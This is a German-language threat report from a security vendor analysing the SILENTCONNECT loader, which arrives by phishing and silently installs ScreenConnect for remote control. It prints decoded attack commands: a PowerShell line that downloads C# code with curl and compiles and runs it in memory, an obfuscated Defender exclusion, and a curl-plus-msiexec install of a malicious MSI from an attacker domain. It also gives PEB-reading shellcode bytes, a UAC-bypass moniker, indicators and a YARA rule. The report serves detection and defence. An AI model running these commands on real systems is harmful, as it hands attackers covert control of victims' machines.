Daniel StepanicSalim Bitam

Von der Einladung zur Infektion: Wie SILENTCONNECT ScreenConnect bereitstellt

SILENTCONNECT ist ein mehrstufiger Loader, der VBScript, die Ausführung von PowerShell im Arbeitsspeicher und PEB-Masquerading nutzt, um das ScreenConnect RMM-Tool im Hintergrund bereitzustellen.

6 Minuten LesezeitMalware-Analyse, Bedrohungsanalyse
From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect

Einführung

Elastic Security Labs beobachtet bösartige Kampagnen, die eine mehrstufige Infektion mithilfe eines bisher undokumentierten Loaders auslösen. Die Infektion beginnt, wenn Benutzer unter dem Deckmantel einer digitalen Einladung auf eine Cloudflare Turnstile CAPTCHA-Seite umgeleitet werden. Nach dem Anklicken des Links wird eine VBScript-Datei auf den Rechner heruntergeladen. Bei der Ausführung ruft das Skript den C#-Quellcode ab, der dann kompiliert und mithilfe von PowerShell im Speicher ausgeführt wird. Die letzte in diesen Kampagnen beobachtete Nutzlast ist ScreenConnect, ein Fernüberwachungs- und -verwaltungstool (RMM), das zur Kontrolle der Rechner der Opfer verwendet wird.

Diese Kampagne verdeutlicht ein gemeinsames Thema: Angreifer missbrauchen Living-off-the-Land-Binärdateien (LOLBins), um die Ausführung zu erleichtern, und nutzen vertrauenswürdige Hosting-Anbieter wie Google Drive und Cloudflare. Obwohl der Lader klein und einfach konstruiert ist, scheint er recht effektiv zu sein und ist seit März 2025 unentdeckt geblieben.

Wichtigste Erkenntnisse

  • SILENTCONNECT ist ein neu entdeckter Loader, der aktiv in freier Wildbahn eingesetzt wird.
  • Dieser Loader installiert ConnectWise ScreenConnect im Hintergrund und ermöglicht so den direkten Tastaturzugriff auf die betroffenen Rechner.
  • Kampagnen, die SILENTCONNECT verbreiten, nutzen die Hosting-Infrastruktur von Cloudflare und Google Drive.
  • SILENTCONNECT nutzt NT-API-Aufrufe, PEB-Masquerading und beinhaltet Windows Defender-Ausschlüsse sowie die Umgehung der Benutzerkontensteuerung (UAC).

SILENTCONNECT-Infektionskette

In der ersten Märzwoche beobachtete unser Team eine Infektion, die durch das Leben in der Natur ausgelöst wurde und innerhalb kurzer Zeit mehrere Verhaltenswarnungen hervorrief.

Der erste VBScript-Download löste unsere Regel „Verdächtiges Windows-Skript aus dem Internet heruntergeladen“ aus, wodurch wir mithilfe der zugehörigen Felder file.origin_url und file.origin_referrer_url zur Infektionsquelle gelangen konnten.

Beim Aufrufen der ursprünglichen Landingpage wurde uns eine Cloudflare Turnstile CAPTCHA-Seite angezeigt. Nach dem Anklicken des Kontrollkästchens für die menschliche Verifizierung wird eine VBScript-Datei (E-INVITE.vbs) auf den Rechner heruntergeladen.

Im Folgenden ist der Quellcode der Landingpage zu sehen. Wir können erkennen, dass die VBScript-Datei (E-INVITE.vbs) auf dem Objektspeicherdienst von Cloudflare r2.dev gehostet wird.

Nachfolgend sind weitere VBScript-Dateinamen aufgeführt, die im letzten Monat im Zusammenhang mit diesen Kampagnen beobachtet wurden:

  • Alaska Airlines 2026 Fleet & Route Expansion Summary.vbs
  • CODE7_ZOOMCALANDER_INSTALLER_4740.vbs
  • 2025Trans.vbs
  • Proposal-03-2026.vbs
  • 2025Trans.vbs
  • updatv35.vbs

Die VBScripts sind nur minimal verschleiert, indem eine Kindergeschichte als Köder verwendet wird, und nutzen die Funktionen Replace() und Chr() , um die nächste Stufe zu verbergen.

Dieses Skript entschlüsselt die Ausgabe und erzeugt folgende Befehlszeilenausgabe:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass 
  -command ""New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; 
  curl.exe -L 'hxxps://drive.google[.]com/uc?id=1ohZxxT-h7xWVgclB1kvpvwkF0AGWoUtq&export=download' 
  -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 
  8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep 
  -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source 
  -Language CSharp; [HelloWorld]::SayHello()""

Dieser Codeausschnitt verwendet PowerShell, um curl.exe aufzurufen, um eine C#-Nutzlast von Google Drive herunterzuladen, die dann unter dem Dateinamen (C:\Windows\Temp\FileR.txt) auf die Festplatte geschrieben wird.

Der abgerufene C#-Quellcode verwendet eine Verschleierungstechnik namens Constant Unfolding, um das für die reflexive In-Memory-Ausführung verwendete Byte-Array zu verbergen.

Schließlich kompiliert der PowerShell-Befehl den heruntergeladenen C#-Quellcode (FileR.txt) zur Laufzeit mit Add-Type, lädt ihn als .NET-Assembly in den Speicher und führt ihn über die Methode [HelloWorld]::SayHello() aus.

SILENTCONNECT

Im folgenden Abschnitt wird die .NET-Loaderfamilie SILENTCONNECT behandelt. Das Beispiel ist relativ klein und einfach aufgebaut und dient in erster Linie dazu, eine Remote-Payload (ScreenConnect) herunterzuladen und sie unbemerkt auf dem System zu installieren.

Nach einer Wartezeit von 15 Sekunden reserviert die Malware mithilfe der nativen Windows-API-Funktion über NtAllocateVirtualMemory ausführbaren Speicher und weist dem Bereich PAGE_EXECUTE_READWRITE die Berechtigungen zu. SILENTCONNECT speichert ein eingebettetes Byte-Array, das folgenden Shellcode enthält:

53                        ; push rbx
48 31 DB                  ; xor rbx, rbx
48 31 C0                  ; xor rax, rax
65 48 8B 1C 25 60000000   ; mov rbx, gs:[0x60]  ← PEB address (x64)
48 89 D8                  ; mov rax, rbx        ← return value
5B                        ; pop rbx
C3                        ; ret

Dieser kleine Shellcode wird mithilfe von Marshal.Copy in den kürzlich zugewiesenen Speicher verschoben. Anschließend führt die Malware den Shellcode aus, um die Adresse des Prozessumgebungsblocks (PEB) zu ermitteln. Dieser Ansatz ermöglicht es der Malware, direkt auf Prozessstrukturen zuzugreifen, während gleichzeitig höherrangige Windows-APIs umgangen werden, die üblicherweise von Sicherheitsprodukten überwacht oder abgefangen werden.

SILENTCONNECT verwendet NTAPIs von ntdll.dll (Native APIs) und ole32.dll (COM APIs) während der Delegateneinrichtungsphase, wodurch die Malware Funktionen wie NtWriteVirtualMemory oder CoGetObject direkt von.NET aufrufen kann.

PEB-Maskierung

SILENTCONNECT nutzt eine gängige Malware-Umgehungstechnik, die als PEB-Masquerading bekannt ist. Alle Windows-Prozesse beinhalten eine vom Kernel verwaltete Struktur, die als Prozessumgebungsblock (PEB) bezeichnet wird. Diese Struktur enthält eine verkettete Liste geladener Module. Innerhalb jeder verketteten Liste befinden sich Einträge, die die Basisadresse des Moduls, den DLL-Namen und den vollständigen Pfad enthalten. SILENTCONNECT durchläuft diese Struktur, findet sein eigenes Modul und überschreibt dann dessen BaseDLLName und FullDllName mit winhlp32.exe und c:\windows\winhlp32.exe.

Viele Sicherheitstools, darunter EDRs, nutzen den PEB als vertrauenswürdige Quelle zur Erkennung verdächtiger Aktivitäten. Diese Technik kann diese Produkte täuschen, indem sie einen harmlosen Namen und Pfad verwendet, um sich zu verbergen.

Vor dem Start der Payload implementiert die Malware eine UAC-Umgehung mithilfe der Funktion LaunchElevatedCOMObjectUnsafe mit umgekehrtem Moniker-String: :wen!rotartsinimdA:noitavelE -> Elevation:Administrator!new:

Befindet sich die Malware in einem Zustand ohne erhöhte Rechte, versucht sie, die UAC-Umgehungstechnik über die CMSTPLUA-COM-Schnittstelle zu nutzen. Die Startparameter werden als einfache Verschleierungstechnik in umgekehrter Reihenfolge in einem Zeichenarray gespeichert.

Der erste Teil dieses verschleierten Befehls fügt eine Microsoft Defender-Ausnahme für .exe -Dateien hinzu.

$ConcreteDataStructure=[char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+
[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]
101;$s=[char](23+23)+[char]101+[char]120+[char]101;&($ConcreteDataStructure) 
-ExclusionExtension $s -Force;

Nachfolgend das Ergebnis dieses Befehls in Defender mit der hinzugefügten Ausnahme:

Nach dem Hinzufügen der Ausnahme erstellt SILENTCONNECT ein temporäres Verzeichnis (C:\Temp) und verwendet curl.exe , um den bösartigen ScreenConnect-Client-Installer hinein herunterzuladen. Anschließend wird msiexec.exe aufgerufen, um RMM im Hintergrund zu installieren. Nachfolgend die zweite Hälfte der Befehlszeile:

New-Item -ItemType Directory -Path 'C:\Temp' -Force | Out-Null; curl.exe -L 
 'hxxps://bumptobabeco[.]top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest'
  -o 'C:\Temp\ScreenConnect.ClientSetup.msi'; Start-Process msiexec.exe '/i 
  C:\Temp\ScreenConnect.ClientSetup.msi'"

Nach der Installation bleibt der ScreenConnect-Client als Windows-Dienst aktiv und sendet Signale an den vom Angreifer kontrollierten ScreenConnect-Server unter bumptobabeco[.]top über den TCP-Port 8041.

SILENTCONNECT-Kampagne

Der primäre erste Zugangsweg für diese Kampagnen besteht aus Phishing-E-Mails. Wir haben eine E-Mail-Probe (YOU ARE INVITED.eml) identifiziert, die im Rahmen einer Kampagne im letzten Jahr auf VirusTotal hochgeladen wurde.

Die E-Mail wird von dan@checkfirst[.]net[.]au gesendet und gibt sich als Einladung zu einem Projektvorschlag einer fiktiven Firma aus. Im E-Mail-Text wird der Empfänger aufgefordert, durch Anklicken eines Links einen Vorschlag einzureichen. Dieser Link leitet das Opfer auf die vom Angreifer kontrollierte Infrastruktur imansport[.]ir/download_invitee.php weiter.

Bemerkenswerterweise verwendete der Angreifer denselben URI-Pfad (download_invitee.php) auf allen kompromittierten Websites, um die Nutzlast zu übermitteln. Diese einheitliche Namenskonvention stellt eine schlechte operative Sicherheitspraxis (OPSEC) dar, da sie einen zuverlässigen Ausgangspunkt für die Verfolgung der Infrastruktur der Kampagne und die Identifizierung weiterer kompromittierter Hosts durch VirusTotal-Suchen wie entity:url url:download_invitee.php bot.

Wir haben außerdem verschiedene legitime Webseiten aufgedeckt, die kompromittiert wurden und dieselbe Infrastruktur nutzten, um andere betrügerische Machenschaften zu ermöglichen. Eine URL (solpru[.]com/process/docusign[.]html) hostet beispielsweise eine Seite, die die elektronische Signaturplattform DocuSign stark nachbildet.


Gefälschtes DocuSign-Portal

Diese Kette umgeht SILENTCONNECT vollständig, indem sie eine vorkonfigurierte ScreenConnect-MSI-Datei herunterlädt, die sich automatisch mit dem Server des Akteurs verbindet (instance-lh1907-relay.screenconnect[.]com).

Eine weitere Seite auf einer anderen Domäne gibt sich als Microsoft Teams-Seite aus und fordert den Benutzer auf, eine Datei herunterzuladen, was zu einem Missbrauch des Syncro RMM Agent führt.

Fazit

Elastic Security Labs beobachtet weiterhin einen Anstieg der Nutzung von RMM durch Bedrohungsakteure. Da diese Tools von legitimen IT-Abteilungen verwendet werden, werden sie in den meisten Unternehmensumgebungen typischerweise übersehen und als „vertrauenswürdig“ angesehen. Organisationen müssen wachsam bleiben und ihre Umgebungen auf unautorisierte RMM-Nutzung überprüfen.

Während diese spezielle Gruppe noch einen Schritt weiter ging und einen eigenen Loader schrieb, nutzt der Großteil ihrer Infektionskette Windows-Binärdateien, um der Erkennung zu entgehen und sich in die normale Systemaktivität einzufügen. Der Missbrauch von vertrauenswürdigen Plattformen wie Google Drive und Cloudflare zum Hosten von Payload und zum Ausliefern von Ködern erschwert die Erkennung zusätzlich, da netzwerkbasierte Kontrollmechanismen den Datenverkehr zu diesen Diensten wahrscheinlich nicht vollständig blockieren. Da Bedrohungsakteure weiterhin Einfachheit und Heimlichkeit der Raffinesse vorziehen, werden Kampagnen dieser Art wahrscheinlich fortbestehen und sich weiterentwickeln.

SILENTCONNECT und MITRE ATT&CK

Elastic verwendet das MITRE ATT&CK-Framework , um gängige Taktiken, Techniken und Verfahren zu dokumentieren, die von Advanced Persistent Threats gegen Unternehmensnetzwerke eingesetzt werden.

Taktiken

Taktiken stellen das Warum einer Technik oder Untertechnik dar. Es ist das taktische Ziel des Gegners: der Grund für die Ausführung einer Aktion.

Techniken

Techniken stellen dar, wie ein Angreifer ein taktisches Ziel erreicht, indem er eine Aktion ausführt.

SILENTCONNECT wird erkannt

YARA

Elastic Security hat die folgenden YARA-Regeln erstellt, um diese Aktivität zu identifizieren:

rule Windows_Trojan_SilentConnect_cdc03e84 {
    meta:
        author = "Elastic Security"
        creation_date = "2026-03-04"
        last_modified = "2026-03-04"
        os = "Windows"
        arch = "x86"
        threat_name = "Windows.Trojan.SilentConnect"
        reference_sample = "8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db"
        license = "Elastic License v2"
    strings:
        $peb_evade = "winhlp32.exe" wide fullword
        $rev_elevation = "wen!rotartsinimdA:noitavelE" wide fullword
        $masquerade_peb_str = "MasqueradePEB" ascii fullword
        $guid = "3E5FC7F9-9A51-4367-9063-A120244FBEC7" wide fullword
        $unique_str = "PebFucker" ascii fullword
        $peb_shellcode = { 53 48 31 DB 48 31 C0 65 48 8B 1C 25 60 00 00 00 }
        $rev_screenconnect = "tcennoCneercS" ascii wide
    condition:
        5 of them
}

Beobachtungen

Die folgenden Observablen wurden in dieser Studie diskutiert.

ÜberwachbarTypNameReferenz
281226ca0203537fa422b17102047dac314bc0c466ec71b2e6350d75f968f2a3SHA-256E-INVITE.vbsVBScript
adc1cf894cd35a7d7176ac5dab005bea55516bc9998d0c96223b6c0004723c37SHA-2562025Trans.vbsVBScript
81956d08c8efd2f0e29fd3962bcf9559c73b1591081f14a6297e226958c30d03SHA-256FileR.txtC#
c3d4361939d3f6cf2fe798fef68d4713141c48dce7dd29d3838a5d0c66aa29c7SHA-256ScreenConnect.ClientSetup.msiSCREENCONNECT-Installateur
8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557dbSHA-256SILENTCONNECT
86.38.225[.]59IPv4-ADDRScreenConnect C2-Server
bumptobabeco[.]topDomainScreenConnect C2-Server
instance-lh1907-relay.screenconnect[.]comDomainScreenConnect C2-Server
349e78de0fe66d1616890e835ede0d18580abe8830c549973d7df8a2a7ffdcecSHA-256ViewDocs.exeSynchron-Installer

Diesen Artikel teilen

FacebookLinkedInReddit (Englisch)